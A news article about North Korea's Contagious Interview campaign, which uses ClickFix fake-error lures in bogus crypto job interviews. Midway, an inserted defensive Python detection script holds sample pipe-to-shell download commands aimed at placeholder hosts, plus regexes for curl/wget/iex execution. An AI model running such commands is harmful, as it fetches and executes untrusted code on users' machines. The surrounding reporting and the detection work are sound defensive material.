Lazarus Group Deploys Malware With ClickFix Scam in Fake Job Interviews

HackRead

North Korea’s Lazarus Group uses the ClickFix scam in fake crypto job interviews to deploy malware, steal data, and fund the regime’s programs.

A recent investigation by SentinelLABS and internet intelligence platform Validin reveals that North Korean threat actors behind the Contagious Interview campaign are actively abusing public cybersecurity platforms like Validin, Maltrail, and VirusTotal to improve their malicious activities.

The Contagious Interview campaign, active since at least 2023, targets job seekers in the cryptocurrency and blockchain industries. The goal is to steal money, which helps North Korea’s sanctioned economy and funds its missile programs. The campaign is widely assessed to be a component of the larger Lazarus Group, a state-sponsored entity focused on generating revenue for North Korea.

The research, shared with Hackread.com, reveals that hackers use these platforms, which are designed to help cybersecurity professionals track threats, to monitor their own domains and avoid detection. Significant operational security (OPSEC) failures exposed files and directory contents, allowing researchers to piece together their timeline and methods.

The investigation covered the period from March to June 2025 and shows a worrying trend: the North Korean hackers operate in highly coordinated teams, likely using communication tools like Slack.

When Validin published an article about the group’s infrastructure on March 11, 2025, the hackers responded within hours, creating accounts to search for information about their own activities.

Even after Validin blocked their initial accounts, the hackers persisted, creating new ones from different email addresses and fake personas. Some of these personas were references to pop culture, like “Rock Lee” and “Mar Vel,” while others impersonated legitimate companies. Reportedly, between January and March 2025, the campaign impacted at least 230 individuals, though the actual number is likely much higher.

Countries targeted in this campaign (Credit: SentinelLABS)

The hackers trick job seekers through a social engineering technique called ClickFix. This involves luring victims to a fake interview website where they are presented with a fabricated error, such as a camera issue. They are then instructed to copy and paste command lines to fix the problem, unknowingly deploying malware.
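A defender-side sketch of the pattern described above, added here as an example and not taken from the SentinelLABS report or Hackread: it scans process command lines for a download that is immediately executed, and raises severity when the command also carries "fix"-style lure wording. The rule patterns, hostnames and sample events are constructed assumptions.

```python
import re

# Constructed heuristics; patterns and names are assumptions for illustration.
FETCH = re.compile(r"\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b[^|;&]*https?://", re.I)
PIPE_EXEC = re.compile(r"\|\s*(sudo\s+)?((ba|z)?sh|iex|invoke-expression)\b", re.I)
SAVE_EXEC = re.compile(r"https?://\S+.*(&&|;)\s*(chmod\s+\+x|(ba|z)?sh\b|\./|start-process)", re.I)
LURE = re.compile(r"camera|driver|update|fix", re.I)


def classify(cmdline):
    """Return (severity, reasons); severity is None when the line is not flagged."""
    reasons = []
    if not FETCH.search(cmdline):
        return None, reasons
    if PIPE_EXEC.search(cmdline):
        reasons.append("download piped to interpreter")
    if SAVE_EXEC.search(cmdline):
        reasons.append("download followed by execute")
    if not reasons:
        return None, reasons  # plain fetch with no execution step
    if LURE.search(cmdline):
        reasons.append("lure wording (camera/driver/update/fix)")
        return "high", reasons
    return "medium", reasons


# Constructed process-creation events (not real telemetry or indicators).
SAMPLE_EVENTS = [
    {"host": "ws-01", "cmdline": "curl -s https://interview.example.invalid/camera-fix.sh | bash"},
    {"host": "ws-02", "cmdline": 'powershell -c "irm https://hire.example.invalid/driver-update | iex"'},
    {"host": "ws-03", "cmdline": "curl -o /tmp/update.bin https://jobs.example.invalid/update.bin && chmod +x /tmp/update.bin"},
    {"host": "ws-04", "cmdline": "wget -qO- https://cdn.example.invalid/install | sh"},
    {"host": "ws-05", "cmdline": "curl -s https://api.example.invalid/health"},
    {"host": "ws-06", "cmdline": "git pull && ./build.sh"},
]


def triage(events):
    """Return [(host, severity)] for every flagged event, in input order."""
    flagged = []
    for event in events:
        severity, _ = classify(event["cmdline"])
        if severity:
            flagged.append((event["host"], severity))
    return flagged


if __name__ == "__main__":
    for host, severity in triage(SAMPLE_EVENTS):
        print(host, severity)
```

The "medium" tier will also match ordinary installer one-liners, so treat it as a prompt to check where the command came from, not as a verdict.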

Attacks are carried out using a special tool, named ContagiousDrop, which is designed to deliver malware disguised as software updates. It’s smart enough to identify if a victim is using Windows, macOS, or Linux and then sends the correct type of malware.

Researchers observed that these applications also have a built-in email notification system that alerts the hackers whenever a victim engages with a fake job assessment or downloads the malicious file.

Email notification recipients (Credit: SentinelLABS)

They also suspect that the hackers are building a victim database, as the attackers’ server logs contained detailed information about the affected individuals, including their full names, email addresses, phone numbers, and IP addresses.

These victims were mainly in marketing and finance roles within the cryptocurrency sector and were targeted with fake job offers from well-known companies like Archblock, Robinhood, and eToro.

The report concludes that the most critical element in stopping this threat is the human factor, urging job seekers to “exercise heightened vigilance when engaging with employment offers and associated assessments.”
